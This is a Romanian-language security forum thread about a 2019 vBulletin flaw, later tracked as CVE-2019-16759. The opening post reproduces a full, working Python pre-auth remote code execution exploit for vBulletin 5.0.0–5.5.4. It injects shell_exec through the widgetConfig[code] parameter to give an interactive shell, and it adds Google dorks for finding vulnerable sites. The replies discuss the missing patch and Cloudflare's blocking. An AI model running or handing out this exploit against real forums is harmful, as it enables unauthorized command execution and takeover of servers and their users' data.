Nytro Posted September 25, 2019 Report Share Posted September 25, 2019 #!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # - site:*.vbulletin.net # - "Powered by vBulletin Version 5.5.4" import requests import sys if len(sys.argv) != 2: sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0]) params = {"routestring":"ajax/render/widget_php"} while True: try: cmd = raw_input("vBulletin$ ") params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;" r = requests.post(url = sys.argv[1], data = params) if r.status_code == 200: print r.text else: sys.exit("Exploit failed! :(") except KeyboardInterrupt: sys.exit("\nClosing shell...") except Exception, e: sys.exit(str(e)) Sursa: FullDisclosure Quote Link to comment Share on other sites More sharing options...
Zatarra Posted September 25, 2019 Report Share Posted September 25, 2019 Au scos patch cei de la vBulletin? Raspund eu: Download Options Download Latest Version 5.5.4 NU Quote Link to comment Share on other sites More sharing options...
Nytro Posted September 25, 2019 Author Report Share Posted September 25, 2019 Dap, se discuta si pe la ei: https://forum.vbulletin.com/forum/vbulletin-5-connect/vbulletin-5-connect-questions-problems-troubleshooting/vbulletin-5-support-issues-questions/4422616-important-vb5-remote-exploit-in-the-wild PS: Sper sa nu te atace si pe noi hackerii cu acest exploit. Quote Link to comment Share on other sites More sharing options...
Members Matasareanu Posted September 25, 2019 Members Report Share Posted September 25, 2019 48 minutes ago, Nytro said: Dap, se discuta si pe la ei: https://forum.vbulletin.com/forum/vbulletin-5-connect/vbulletin-5-connect-questions-problems-troubleshooting/vbulletin-5-support-issues-questions/4422616-important-vb5-remote-exploit-in-the-wild PS: Sper sa nu te atace si pe noi hackerii cu acest exploit. Pot sa incerce 😂 Quote Link to comment Share on other sites More sharing options...
Nytro Posted September 25, 2019 Author Report Share Posted September 25, 2019 Ei bine... 1 Quote Link to comment Share on other sites More sharing options...
mrreboot Posted September 29, 2019 Report Share Posted September 29, 2019 https://www.bleepingcomputer.com/news/security/cloudflare-now-blocks-the-vbulletin-rce-cve-2019-16759-exploit/ Quote Link to comment Share on other sites More sharing options...